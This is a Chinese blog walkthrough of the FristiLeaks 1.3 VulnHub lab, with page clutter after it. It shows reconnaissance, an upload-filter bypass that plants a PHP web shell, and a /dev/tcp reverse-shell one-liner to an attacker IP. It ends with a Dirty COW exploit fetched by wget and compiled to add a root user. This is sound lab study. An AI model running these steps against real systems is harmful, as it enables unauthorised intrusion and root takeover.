【vulnhub】FristiLeaks_1.3靶机

最新推荐文章于 2024-09-07 22:37:02 发布
最新推荐文章于 2024-09-07 22:37:02 发布
阅读量269 收藏 8
点赞数 5
文章标签: web安全 网络安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62162207/article/details/140857900
版权

运行环境:Virtualbox

靶机下载地址:FristiLeaks: 1.3 ~ VulnHub

目标:获取靶机root权限和flag

一、信息收集

1.靶机导入

需要在VirtualBoxVM上导入,设置kali和靶机为桥接地址,根据靶机描述要将MAC地址改为08:00:27:A5:A6:76

2.主机扫描

arp-scan -l

3.端口扫描

nmap -p- 192.168.7.188

4.目录扫描,发现有两个目录

二、内网渗透

打开80端口页面

拼接路径进行访问,发现robots.txt有几个路径

拼接访问后是一张图片,没有别的信息

回头看首页文件,根据提示,将fristi作为路径进行访问

http://192.168.7.188/fristi/

发现了一个登陆路径

测试有无SQL注入,发现没有,查看页面源代码,发现了一封由eezeepz写的邮件,和一串base64加密的值

进行解密

将其写入kali文件,进行解密

base64 -d base64.txt

发现是PNG格式的,将其写入一个图片格式

base64 -d base64.txt > base64.png

打开图片,发现有一串密钥

结合上述邮件的作者,可以猜想这个很可能是账户密码

账号:eezeepz密码:keKkeKKeKKeKkEkkEk

登录后发现了一个 文件上传处

抓包修改文件后缀上传

上传失败,发现只能上传三种类型的文件

尝试修改后缀名为666.php.png上传

发现上传成功,且爆出了上传路径 /uploads

访问,发现成功解析

蚁剑连接成功

反弹shell

# 蚁剑
0<&196;exec 196<>/dev/tcp/192.168.7.145/4444; sh <&196 >&196 2>&196
# kali
nc -lvvp 4444

监听成功

三、提权

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

查看内核版本,为Linux 2.6.32-573.8.1.el6.x86_64

可以使用脏牛提权

searchsploit "Dirty CON"

searchsploit -m 文件名字进行下载

kali开启一个web服务

python3 -m http.server
 
靶机:
cd /tmp
wget http://192.168.7.145:8000/40839.c  #远程下载
gcc -pthread 40839.c -o 40839 -lcrypt  #进行编译
chmod +x 40839 #加执行权限
./40839 #执行

执行需要设置一个密码,这里是123456,将会写入/etc/passwd中

查看/etc/passwd文件,发现写入的用户firefart有root权限

切换到firefart

su firefart

提权成功

下届免单用户
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机FristiLeaks_1.3
qq_48904485的博客
03-19 1009
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机FristiLeaks 1.3(10.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/注意安装靶机的时候需要将靶机的MAC地址改为:08:00:27:A5:A6:76,否则靶机ip地址会获取不到。
vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 983
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
FristiLeaks_1.3#攻略
qq_27466929的博客
09-21 1105
FristiLeaks_1.3#攻略
vulnhub靶机渗透 FRISTILEAKS: 1.3
RestoreJustice的博客
03-18 250
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。冷静(fristi),这张图片就是首页的我们第二次看到再结合到上一张图片的提示,这张很有可能有提示。根据官网提供的说明,首先要将要求设置VMware虚拟机的MAC地址 08:00:27:A5:A6:76,然后开启VM。在图片中插入phpinfo和一句话木马,成功上传到 /uploads目录,根据前面的目录爆破可知上传路径。
靶机FristiLeaks_1.3
AzVoidSUN的博客
05-10 880
下载连接 https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea ks/FristiLeaks_1.3.ova 运行环境 Virtualbox (二选一) Vnware Workstation player VMware用户将需要手动将VM...
FristiLeaks_1.3
cxyzupup的博客
01-10 764
FristiLeaks_1.3 项目地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 提示: (1)靶机网络连接方式使用NAT模式 (2)该靶机做了地址绑定,因此需要设置固定物理地址才能获取IP地址;物理地址为:08:00:27:A5:A6:76 文章目录FristiLeaks_1.3一、信息收集1. 使用nmap收集端口服务信息:2. 查看tcp80端口:3. 使用gobuster工具对http服务进行枚举:3.1 查看/images目录:3.2 查
FristiLeaks_1.3靶机渗透测试
weixin_58786230的博客
08-01 241
发现只开启了80端口。
vulnhub渗透系列之FristiLeaks: 1.3
来到了学渣的博客
02-06 2122
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.该靶机安装好后自动提示了IP地址,所以直接探测存活的端口就行,发现与以往不一样的是它只开放了80端口,nmap同时也扫出来cola/sisi/beer三个目录。 2.进入80端web页面,登录到cola/sisi/beer发现图片提示主要...
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3
LYJ20010728的博客
08-06 1450
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3环境下载TOPHATSEC: FRESHLY靶机搭建渗透测试信息搜集漏洞挖掘 环境下载 戳此进行环境下载 TOPHATSEC: FRESHLY靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式,虚拟机的MAC地址为:08:00:27:A5:A6:76 获取到目标靶机的IP为:192.168.246.132 渗透测试 信息搜集 用Nmap扫描一下目标靶机:sudo nmap -sS -A 192.168.246.
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
靶机渗透测试:basic_pentesting_1靶机提权
x_13579的博客
04-13 788
靶场提权
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1339
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
最新发布
等风来
09-07 94
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
Web安全之SQL注入:如何预防及解决
weixin_39996520的博客
09-07 819
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 565
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-06 844
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全】服务基础第二阶段——第三节:Linux系统管理基础----Linux用户与组管理
goldfish8848的博客
09-07 442
SUID、SGID 和 Sticky Bit 都在Linux提权中扮演了重要⻆⾊。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1633
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值